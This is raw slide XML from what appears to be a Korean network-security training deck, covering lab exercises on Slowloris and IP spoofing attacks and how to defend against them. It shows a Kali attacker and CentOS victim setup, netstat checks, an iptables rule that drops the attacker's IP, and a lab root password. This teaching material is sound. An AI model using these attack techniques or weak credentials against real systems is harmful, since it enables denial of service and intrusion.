                <a:schemeClr val="accent6">
                  <a:lumMod val="7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en-US" altLang="ko-KR" sz="1000" kern="0" spc="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2">
                    <a:lumMod val="9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000" kern="0" spc="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2">
                    <a:lumMod val="9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000" kern="0" spc="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2">
                    <a:lumMod val="9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Slowloris </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" kern="0" spc="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2">
                    <a:lumMod val="9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공격을 수행할 수 있다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" kern="0" spc="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2">
                    <a:lumMod val="9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- Slowloris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공격을 탐지하고 방어할 수 있다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0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EC8135D1-75B8-4CE8-AF52-A075050006C4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="5400000">
            <a:off x="585225" y="2090876"/>
            <a:ext cx="730420" cy="730420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6">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:gs>
                <a:gs pos="100000">
                  <a:schemeClr val="accent6">
                    <a:lumMod val="20000"/>
                    <a:lumOff val="80000"/>
                  </a:schemeClr>
                </a:gs>
              </a:gsLst>
              <a:lin ang="5400000" scaled="1"/>
            </a:gra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gradFill>
                <a:gsLst>
                  <a:gs pos="0">
                    <a:schemeClr val="accent6">
                      <a:lumMod val="75000"/>
                    </a:schemeClr>
                  </a:gs>
                  <a:gs pos="88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244678E-3E32-4375-A935-CA411D9F8F9B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="5400000">
            <a:off x="6263266" y="2090876"/>
            <a:ext cx="730420" cy="730420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2">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:gs>
                <a:gs pos="100000">
                  <a:schemeClr val="accent2">
                    <a:lumMod val="40000"/>
                    <a:lumOff val="60000"/>
                  </a:schemeClr>
                </a:gs>
              </a:gsLst>
              <a:lin ang="5400000" scaled="1"/>
            </a:gra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gradFill>
                <a:gsLst>
                  <a:gs pos="0">
                    <a:schemeClr val="accent6">
                      <a:lumMod val="75000"/>
                    </a:schemeClr>
                  </a:gs>
                  <a:gs pos="88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endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="49" name="Picture 8" descr="cent os 아이콘 이미지 검색결과">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3B355687-60F8-4A97-9717-DF06525177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703" b="-400"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6394394" y="2199019"/>
            <a:ext cx="499434" cy="500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5E04B7BD-7FFA-4CF6-8896-A184055B3CEA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7178875" y="2105495"/>
            <a:ext cx="4432682" cy="838800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:solidFill>
              <a:schemeClr val="accent2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ko-KR" altLang="en-US" sz="1200" b="1" kern="0" spc="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실습</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1200" b="1" kern="0" spc="200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2">
                    <a:lumMod val="7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환경</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1200" b="1" kern="0" spc="200" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent2">
                  <a:lumMod val="7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sv-SE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Attacker(Kali linux / 10.10.1.166)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="sv-SE" altLang="ko-KR" sz="10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lang="sv-SE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Victim(CentOS 6.4 / 10.10.1.101)</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17" name="화살표: 오른쪽 16">
            <a:hlinkClick r:id="" action="ppaction://noaction"/>
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{81ED7C86-D7B4-4134-B0EF-1B7A83056B06}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="580444" y="596349"/>
            <a:ext cx="257755" cy="206099"/>
          </a:xfrm>
          <a:prstGeom prst="rightArrow">
            <a:avLst>
              <a:gd name="adj1" fmla="val 50000"/>
              <a:gd name="adj2" fmla="val 73148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BC968331-6BDC-4EF6-BD34-D24E17DAB382}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="11593737" y="6457890"/>
            <a:ext cx="678993" cy="400110"/>
            <a:chOff x="10627762" y="-30288"/>
            <a:chExt cx="597159" cy="400110"/>
          </a:xfrm>
        </p:grpSpPr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B846F5E4-F54B-48E4-884D-8B11C27E605D}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="10675841" y="11905"/>
              <a:ext cx="464911" cy="338139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1A05602-C5D7-4549-9695-4E18B65B363A}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="10627762" y="-30288"/>
              <a:ext cx="5971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2">
                      <a:lumMod val="50000"/>
                    </a:schemeClr>
                  </a:solidFill>
                </a:rPr>
                <a:t>L I N K</a:t>
              </a:r>
              <a:endParaRPr lang="ko-KR" alt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21" name="화살표: 오른쪽 20">
              <a:hlinkClick r:id="" action="ppaction://noaction"/>
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B386215C-A1C0-4471-8A61-6BCBE3FCC914}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipH="1">
              <a:off x="10773860" y="150995"/>
              <a:ext cx="251325" cy="187144"/>
            </a:xfrm>
            <a:prstGeom prst="rightArrow">
              <a:avLst>
                <a:gd name="adj1" fmla="val 50000"/>
                <a:gd name="adj2" fmla="val 73148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2" name="Picture 2" descr="보안 아이콘 이미지 검색결과">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A945EE6F-447F-47A7-A88B-6A750291CB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74" t="12467" r="11967" b="12532"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="662681" y="3412409"/>
            <a:ext cx="565945" cy="562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270631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화살표: 오른쪽 8">
            <a:hlinkClick r:id="" action="ppaction://noaction"/>
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{36DC0363-5748-4238-A24E-3E0F461FCB92}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="134367" y="97585"/>
            <a:ext cx="257755" cy="206099"/>
          </a:xfrm>
          <a:prstGeom prst="rightArrow">
            <a:avLst>
              <a:gd name="adj1" fmla="val 50000"/>
              <a:gd name="adj2" fmla="val 73148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2DF244-1E45-44A0-B32E-616FEC167CD6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="392122" y="368998"/>
            <a:ext cx="5616792" cy="6120000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en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>1) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>공격이 들어오는지 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>netstat –</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>tna</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>로 확인</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t># netstat –</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>tna</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t> </a:t>
            </a:r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r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>2) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>웹 브라우저 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>firefox</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>실행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B02FE9C-319E-4A1A-B3F6-06CCEB53FD1E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6183088" y="368998"/>
            <a:ext cx="5616792" cy="6120000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en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>3) localhost </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>접속 시도</a:t>
            </a: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r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>4) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>iptable</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t> -A INPUT -s 10.10.1.166 -j DROP</a:t>
            </a:r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r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t> 5) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>웹 브라우저 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>firefox</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>에서 다시 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>localhost</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>로 접속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4C33198-2E58-4A38-8153-C72034623E33}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="11593737" y="6457890"/>
            <a:ext cx="678993" cy="400110"/>
            <a:chOff x="10627762" y="-30288"/>
            <a:chExt cx="597159" cy="400110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1BD440D7-A4B6-422E-BEF0-DA734161F7A3}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="10675841" y="11905"/>
              <a:ext cx="464911" cy="338139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C45BEB1-A639-4FC8-BFA8-B46B8EC4E337}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="10627762" y="-30288"/>
              <a:ext cx="5971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2">
                      <a:lumMod val="50000"/>
                    </a:schemeClr>
                  </a:solidFill>
                </a:rPr>
                <a:t>L I N K</a:t>
              </a:r>
              <a:endParaRPr lang="ko-KR" alt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8" name="화살표: 오른쪽 7">
              <a:hlinkClick r:id="" action="ppaction://noaction"/>
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{70F00BAB-BC11-49E5-AFFF-32BB961D8637}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipH="1">
              <a:off x="10773860" y="150995"/>
              <a:ext cx="251325" cy="187144"/>
            </a:xfrm>
            <a:prstGeom prst="rightArrow">
              <a:avLst>
                <a:gd name="adj1" fmla="val 50000"/>
                <a:gd name="adj2" fmla="val 73148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097" name="_x247859480">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CE161DF9-0C62-4686-BEA6-25938C6963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180" y="877824"/>
            <a:ext cx="5400675" cy="3208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_x247859320">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CCE5AE86-8F64-44A8-A218-223DBDBA1C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" y="4594988"/>
            <a:ext cx="4427538" cy="1363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" name="_x247859160">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E5A90F5E-D397-4FBF-9094-6E68189176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1146" y="655957"/>
            <a:ext cx="5400675" cy="1838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3" name="_x247859080">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{639FEAE2-9ACB-496E-BD5C-22BE5EA42C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5936" y="3090672"/>
            <a:ext cx="4694238" cy="198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5" name="_x247859480">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6BCFC429-5F60-4825-836F-B8069AE327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7832" y="3840480"/>
            <a:ext cx="5400675" cy="253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115220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화살표: 오른쪽 8">
            <a:hlinkClick r:id="" action="ppaction://noaction"/>
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{36DC0363-5748-4238-A24E-3E0F461FCB92}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="134367" y="97585"/>
            <a:ext cx="257755" cy="206099"/>
          </a:xfrm>
          <a:prstGeom prst="rightArrow">
            <a:avLst>
              <a:gd name="adj1" fmla="val 50000"/>
              <a:gd name="adj2" fmla="val 73148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2DF244-1E45-44A0-B32E-616FEC167CD6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="392122" y="368998"/>
            <a:ext cx="5616792" cy="6120000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en-US" altLang="ko-KR" sz="1000"/>
              <a:t># check</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1000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4C33198-2E58-4A38-8153-C72034623E33}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="11593737" y="6457890"/>
            <a:ext cx="678993" cy="400110"/>
            <a:chOff x="10627762" y="-30288"/>
            <a:chExt cx="597159" cy="400110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1BD440D7-A4B6-422E-BEF0-DA734161F7A3}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="10675841" y="11905"/>
              <a:ext cx="464911" cy="338139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C45BEB1-A639-4FC8-BFA8-B46B8EC4E337}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="10627762" y="-30288"/>
              <a:ext cx="5971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2">
                      <a:lumMod val="50000"/>
                    </a:schemeClr>
                  </a:solidFill>
                </a:rPr>
                <a:t>L I N K</a:t>
              </a:r>
              <a:endParaRPr lang="ko-KR" alt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8" name="화살표: 오른쪽 7">
              <a:hlinkClick r:id="" action="ppaction://noaction"/>
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{70F00BAB-BC11-49E5-AFFF-32BB961D8637}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipH="1">
              <a:off x="10773860" y="150995"/>
              <a:ext cx="251325" cy="187144"/>
            </a:xfrm>
            <a:prstGeom prst="rightArrow">
              <a:avLst>
                <a:gd name="adj1" fmla="val 50000"/>
                <a:gd name="adj2" fmla="val 73148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5121" name="_x247860040">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A8BD1F33-A6EF-4486-B103-18677A276F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980" y="719328"/>
            <a:ext cx="2522538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17112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">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3010DBED-3ABA-4169-8A96-F92BD8C53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sz="2000" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="65000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>/Training/Unit/Net/10</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t> 10. IP Spoofing -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>대응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6A2CC12-A97B-4DB5-936F-E7C75CBB4AA0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1496053" y="3328503"/>
            <a:ext cx="4432683" cy="2833758"/>
          </a:xfrm>
          <a:prstGeom prst="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ko-KR" altLang="en-US" sz="1200" b="1" kern="0" spc="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대응</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1200" b="1" kern="0" spc="2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실습</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1200" b="1" kern="0" spc="200" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent1">
                  <a:lumMod val="7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공격자가 현재 서버를 대상으로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ICMP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US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플러딩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공격을 시도하고 있다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  <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="10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공격자의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MAC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주소를 식별하여 방화벽으로 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US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차단하시오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000" dirty="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9A933898-9CDB-4360-99A0-123577882146}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="5400000">
            <a:off x="580444" y="3328504"/>
            <a:ext cx="730420" cy="730420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1">
                    <a:lumMod val="75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5400000" scaled="1"/>
            </a:gra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gradFill>
                <a:gsLst>
                  <a:gs pos="0">
                    <a:schemeClr val="accent6">
                      <a:lumMod val="75000"/>
                    </a:schemeClr>
                  </a:gs>
                  <a:gs pos="88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endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="38" name="Picture 14" descr="appendix icon 이미지 검색결과">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{ECF5A187-5DE1-4A4A-8190-F2DCF30DE9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5354" y="3380506"/>
            <a:ext cx="586243" cy="586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타원 38">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9D901AF2-8468-4E57-A19A-D88B7F554DE3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="5400000">
            <a:off x="6263266" y="3308419"/>
            <a:ext cx="730420" cy="730420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4">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:gs>
                <a:gs pos="100000">
                  <a:schemeClr val="accent4">
                    <a:lumMod val="40000"/>
                    <a:lumOff val="60000"/>
                  </a:schemeClr>
                </a:gs>
              </a:gsLst>
              <a:lin ang="5400000" scaled="1"/>
            </a:gra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gradFill>
                <a:gsLst>
                  <a:gs pos="0">
                    <a:schemeClr val="accent6">
                      <a:lumMod val="75000"/>
                    </a:schemeClr>
                  </a:gs>
                  <a:gs pos="88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36006CD-64B2-4E12-B317-9204AA016FB5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7178875" y="3313578"/>
            <a:ext cx="4432682" cy="2833758"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:solidFill>
              <a:schemeClr val="accent4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ko-KR" altLang="en-US" sz="1200" b="1" kern="0" spc="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참고</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1200" b="1" kern="0" spc="200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent4">
                    <a:lumMod val="7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사항</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1200" b="1" kern="0" spc="200" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent4">
                  <a:lumMod val="7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[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시스템 정보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   &lt;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실습서버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  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계정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: root / root123</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="41" name="Picture 4" descr="목표 아이콘 이미지 검색결과">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EF9F62EB-7866-4E3F-8A25-E78C25AC4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559" y="2093753"/>
            <a:ext cx="677306" cy="677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9C59BC4E-1690-4F25-A340-257E8B4DCFAD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1496054" y="2093753"/>
            <a:ext cx="4432682" cy="836832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ko-KR" altLang="en-US" sz="1200" b="1" kern="0" spc="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교육</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1200" b="1" kern="0" spc="200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent6">
                    <a:lumMod val="7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목표</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1200" kern="0" spc="200" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent6">
                  <a:lumMod val="7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en-US" altLang="ko-KR" sz="1000" kern="0" spc="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2">
                    <a:lumMod val="7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- IP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" kern="0" spc="0" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg2">
                    <a:lumMod val="7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스푸핑</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" kern="0" spc="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2">
                    <a:lumMod val="7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공격을 수행할 수 있다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" kern="0" spc="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2">
                    <a:lumMod val="7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- IP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US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스푸핑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공격을 탐지하고 대응할 수 있다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0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EC8135D1-75B8-4CE8-AF52-A075050006C4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="5400000">
            <a:off x="585225" y="2090876"/>
            <a:ext cx="730420" cy="730420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6">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:gs>
                <a:gs pos="100000">
                  <a:schemeClr val="accent6">
                    <a:lumMod val="20000"/>
                    <a:lumOff val="80000"/>
                  </a:schemeClr>
                </a:gs>
              </a:gsLst>
              <a:lin ang="5400000" scaled="1"/>
            </a:gra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gradFill>
                <a:gsLst>
                  <a:gs pos="0">
                    <a:schemeClr val="accent6">
                      <a:lumMod val="75000"/>
                    </a:schemeClr>
                  </a:gs>
                  <a:gs pos="88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244678E-3E32-4375-A935-CA411D9F8F9B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="5400000">
            <a:off x="6263266" y="2090876"/>
            <a:ext cx="730420" cy="730420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2">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:gs>
                <a:gs pos="100000">
                  <a:schemeClr val="accent2">
                    <a:lumMod val="40000"/>
                    <a:lumOff val="60000"/>
                  </a:schemeClr>
                </a:gs>
              </a:gsLst>
              <a:lin ang="5400000" scaled="1"/>
            </a:gra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gradFill>
                <a:gsLst>
                  <a:gs pos="0">
                    <a:schemeClr val="accent6">
                      <a:lumMod val="75000"/>
                    </a:schemeClr>
                  </a:gs>
                  <a:gs pos="88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endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="49" name="Picture 8" descr="cent os 아이콘 이미지 검색결과">
            <a:extLst>
